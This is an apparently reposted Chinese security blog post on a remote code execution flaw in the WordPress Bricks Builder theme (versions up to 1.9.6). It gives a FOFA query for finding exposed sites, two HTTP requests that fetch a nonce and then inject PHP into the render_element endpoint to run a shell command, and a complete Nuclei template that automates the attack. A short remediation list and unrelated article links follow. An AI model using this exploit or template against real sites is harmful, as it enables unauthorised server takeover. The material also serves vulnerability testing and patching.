当前位置：首页 > news >正文

WordPres Bricks Builder 前台RCE漏洞

news 2026/5/18 10:56:15

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

Bricks Builder是一款用于WordPress的开发主题，提供直观的拖放界面，用于设计和构建WordPress网站。它使用户能够轻松创建自定义的网页布局和设计，无需编写或了解复杂的代码。Bricks Builder具有用户友好的界面和强大的功能，使用户可以通过简单的拖放操作添加、编辑和排列各种网页元素，例如文本框、图像、按钮、导航菜单等。它为WordPress用户提供了一种直观且便捷的方式来构建专业和吸引人的网站，无论是个人博客、商业网站还是电子商务平台。

由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用，導致遠程代碼執行漏洞，惡意攻擊者可能會利用此漏洞執行惡意代碼，從而獲取服務器權限。

影響版本

Brick Builder 主题在低于<= 1.9.6

Ⅱ、fofa语句

body="/wp-content/themes/bricks/"

Ⅲ、漏洞复现

POC-1

GET / HTTP/1.1
Host: 127.0.0.1

POC-2

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Content-Type: application/json{"postId": "1","nonce": "dc50d26123","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}
}

1、构建 POC，获取nonce值

2、使用第一步获取的nonce值构造数据包，执行RCE

Ⅳ、Nuclei-POC

id: WordPres-Bricks-Builder-RCEinfo:name: 由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用，導致遠程代碼執行漏洞，惡意攻擊者可能會利用此漏洞執行惡意代碼，從而獲取服務器權限。author: WLFseverity: highmetadata: fofa-query: body="/wp-content/themes/bricks/"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |GET / HTTP/1.1Host: {{Hostname}}- |POST /wp-json/bricks/v1/render_element HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: */*Content-Type: application/json{"postId": "1","nonce": "{{path}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}}extractors:- type: regexname: pathgroup: 1regex:- '"nonce":"(\w*)"'internal: truematchers:- type: dsldsl:- status_code==200 && contains_all(body,"Exception","gid=","uid=")

Ⅴ、修复建议

1、关闭互联网暴露面或接口设置访问权限

2、部署WAF对站点路径进行防护

3、将Bricks Builder组件升级只安全版本

WordPres Bricks Builder 前台RCE漏洞

相关文章：

WordPres Bricks Builder 前台RCE漏洞

渗透测试—信息收集

安卓adb调试备忘录

【软件架构】01-架构的概述

Vue 图片轮播第三方库介绍

设置主从复制时发生报错Could not find first log file name in binary log index file‘；解决方案

React Context的使用方法

ElasticSearch索引数据备份与恢复

kubernetes日志收集 fluent-operator 动态索引名的实现

pip换源

7.（数据结构）堆

AWS Elastic Beanstalk通过应用负载均衡配置https

AC自动机：文本搜索的加速器

备战蓝桥杯---基础算法刷题1

探索 Flutter 中的动画：使用 flutter_animate

装机容量对光伏发电量的影响有多大？如何通过装机容量计算发电量？

软考37-上午题-【数据库】-数据模型、数据库的三级模式和二级映像

06 分频器设计

力扣hot100题解（python版7-9题）

ECMAScript 6+ 新特性 ( 四 ) 迭代器与生成器

从零构建AOD-Net：PyTorch实战图像去雾模型开发全流程

Performance-Fish：深度解析《环世界》400%性能优化核心技术

如何快速解密网易云NCM文件：终极免费转换工具指南

终极指南：3步掌握yfinance金融数据获取与智能修复实战

基于MCP协议的AI Agent远程SSH安全操作实践指南

【仅剩217份】《Midjourney后印象派风格白皮书》V2.3——含17位艺术家专属LoRA适配建议、32组跨文化色彩映射表及实时风格强度校准工具（2024.06内部封测版）

AI驱动工作流自动化：从原理到实践，构建智能效率引擎

U-Boot实战：FAT文件系统五大核心命令详解与应用

Agent 一接分布式缓存就开始数据不一致：从 Cache Coherence 到 Write-Through Guard 的工程实战

Step-by-Step知识蒸馏：让小模型学会大模型的推理过程